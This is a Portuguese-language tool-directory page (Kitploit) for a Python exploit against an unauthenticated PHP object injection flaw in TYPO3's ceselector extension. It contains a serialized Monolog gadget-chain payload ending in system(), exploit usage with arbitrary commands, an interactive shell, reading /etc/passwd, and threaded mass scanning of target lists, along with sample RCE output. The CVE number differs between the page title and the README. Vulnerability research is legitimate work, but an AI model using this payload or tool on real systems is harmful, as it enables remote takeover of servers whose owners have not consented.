Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-46275 — Exploit em Python para CVE-2026-46725, alcançando execução remota de código não autenticada na extensão ceselector do TYPO3 via injeção de objeto PHP e cadeia de gadgets Monolog. | Kitploit
Ferramentas/GitHubGitHub/xxconi/cve-2026-46275
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubxxconi/cve-2026-46275

CVE-2026-46275

Exploit em Python para CVE-2026-46725, alcançando execução remota de código não autenticada na extensão ceselector do TYPO3 via injeção de objeto PHP e cadeia de gadgets Monolog.

Ver Repositório
9há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-46725 — RCE na Extensão ceselector do TYPO3

Injeção de Objeto PHP via bypass de cookie em unserialize() → Execução Remota de Código

CVSS CWE Auth Python License


📋 Índice

  • Sobre a Vulnerabilidade
  • Detalhes Técnicos
  • Requisitos
  • Instalação
  • Uso
  • Exemplos
  • Formato de Saída
  • Como Funciona
  • Referências
  • Aviso Legal

🔍 Sobre a Vulnerabilidade

CampoDetalhe
CVE IDCVE-2026-46725
ProdutoExtensão ceselector do TYPO3 (mmc/ceselector)
Versão Afetada<= 1.1.3
Tipo de VulnerabilidadeDesserialização Insegura (Injeção de Objeto PHP)
Pontuação CVSS9.8 Crítica
Vetor CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-502 (Desserialização de Dados Não Confiáveis)
Pontuação EPSS0.0046 (percentil 64,3%)
AutenticaçãoNão é necessária (não autenticado)
ImpactoRCE Total — controle total do sistema
PesquisadorDhiyaneshDk

Descrição

A extensão ceselector do TYPO3 repassa o valor do cookie T3_ceselector_* diretamente para a função unserialize(), sem qualquer validação. Um atacante pode inserir um payload de Injeção de Objeto PHP especialmente elaborado nesse cookie e executar comandos arbitrários no servidor.

⚠️ Pré-requisito: Para que a vulnerabilidade possa ser explorada, a configuração Persistent Mode: Static deve estar ativa no TYPO3.


🔧 Detalhes Técnicos

Fluxo do Ataque

1. GET /  →  O servidor retorna Set-Cookie: T3_ceselector_<id>=<value>
2. GET /  →  Cookie: T3_ceselector_<id>=<PAYLOAD>
             └─ PHP unserialize() é acionado
             └─ Monolog Gadget Chain é executada
             └─ A saída de system("id") é refletida na resposta

Cadeia de Gadgets

Monolog\Handler\GroupHandler
  └─ Monolog\Handler\BufferHandler
       └─ Monolog\LogRecord (buffer)
            └─ processors: [get_object_vars, end, system]
                 └─ system("<CMD>")  ← RCE

Estrutura do Payload

O:28:"Monolog\Handler\GroupHandler":1:{
  s:11:"*handlers";a:1:{
    i:0;O:29:"Monolog\Handler\BufferHandler":6:{
      s:10:"*handler";r:3;
      s:13:"*bufferSize";i:1;
      s:14:"*bufferLimit";i:0;
      s:9:"*buffer";a:1:{
        i:0;O:17:"Monolog\LogRecord":2:{
          s:5:"level";E:19:"Monolog\Level:Debug";
          s:5:"mixed";s:2:"id";   ← o comando do SO vai aqui
        }
      }
      s:14:"*initialized";b:1;
      s:13:"*processors";a:3:{
        i:0;s:15:"get_object_vars";
        i:1;s:3:"end";
        i:2;s:6:"system";   ← sink
      }
    }
  }
}

📦 Requisitos

  • Python 3.8+
  • Biblioteca requests
Python >= 3.8
requests >= 2.28.0

⚙️ Instalação

# Clona o repositório
git clone https://github.com/example/CVE-2026-46725
cd CVE-2026-46725

# Instala as dependências
pip install requests

# ou com requirements.txt
pip install -r requirements.txt

requirements.txt

requests>=2.28.0
urllib3>=1.26.0

🚀 Uso

usage: CVE-2026-46725 [-h] (-u URL | -l FILE) [-c CMD] [-i]
                      [-t N] [--timeout S] [--proxy URL]
                      [-o FILE] [-v] [--no-color]

opções:
Alvo:
  -u, --url URL       URL de alvo único
  -l, --list FILE     Lista de alvos (uma URL por linha)

Exploit:
  -c, --cmd CMD       Comando do SO a executar (padrão: id)
  -i, --interactive   Abre shell interativo após exploit bem-sucedido

Varredura:
  -t, --threads N     Número de threads (padrão: 10)
  --timeout S         Timeout em segundos (padrão: 15)
  --proxy URL         Proxy (ex.: http://127.0.0.1:8080)

Saída:
  -o, --output FILE   Arquivo de resultados
  -v, --verbose       Saída detalhada
  --no-color          Saída sem cores

📌 Exemplos

Alvo Único — Uso Básico

python CVE-2026-46725.py -u https://typo3-site.com

Executar Comando Personalizado

python CVE-2026-46725.py -u https://typo3-site.com -c "whoami"
python CVE-2026-46725.py -u https://typo3-site.com -c "cat /etc/passwd"
python CVE-2026-46725.py -u https://typo3-site.com -c "uname -a"

Shell Interativo

python CVE-2026-46725.py -u https://typo3-site.com --interactive
typo3@ceselector $ id
│ uid=33(www-data) gid=33(www-data) groups=33(www-data)
typo3@ceselector $ uname -a
│ Linux web01 5.15.0-91-generic #101-Ubuntu SMP x86_64 GNU/Linux
typo3@ceselector $ pwd
│ /var/www/html
typo3@ceselector $ exit

Varredura em Massa

# Varre com 20 threads e salva os resultados
python CVE-2026-46725.py -l targets.txt -t 20 -o results.txt

# 30 threads, comando personalizado
python CVE-2026-46725.py -l targets.txt -t 30 -c "id"

Com Proxy (Burp Suite)

python CVE-2026-46725.py -u https://typo3-site.com \
  --proxy http://127.0.0.1:8080 -v

Formato do targets.txt

https://site1.com
https://site2.com
http://site3.com
site4.com

📊 Formato de Saída

Saída no Terminal

① Detecção de TYPO3 & ceselector
────────────────────────────────────────────────────
· TYPO3             ✓ Detectado
· ceselector        ✓ Ativo
· Nome do Cookie    T3_ceselector_48291
· Versão do TYPO3   12.4.3

② Preparando o Payload
────────────────────────────────────────────────────
· Técnica           PHP Object Injection → Monolog Gadget Chain
· Gadget            Monolog\Handler\GroupHandler
· Sink              system()
· Comando           id

④ Saída do RCE
────────────────────────────────────────────────────
┌─ SAÍDA DO RCE ───────────────────────────────────
│ uid=33(www-data) gid=33(www-data) groups=33(www-data)
└─────────────────────────────────────────────────

Arquivo de Log (results.txt)

============================================================
CVE-2026-46725 — TYPO3 ceselector RCE
Data: 2026-05-26 17:30:00
============================================================

[+] ALVOS COM RCE OBTIDO (2)
----------------------------------------
URL        : https://typo3-site.com
Versão     : 12.4.3
Cookie     : T3_ceselector_48291
Comando    : id
Saída      : uid=33(www-data) gid=33(www-data) groups=33(www-data)

🔬 Como Funciona

Baixar ferramenta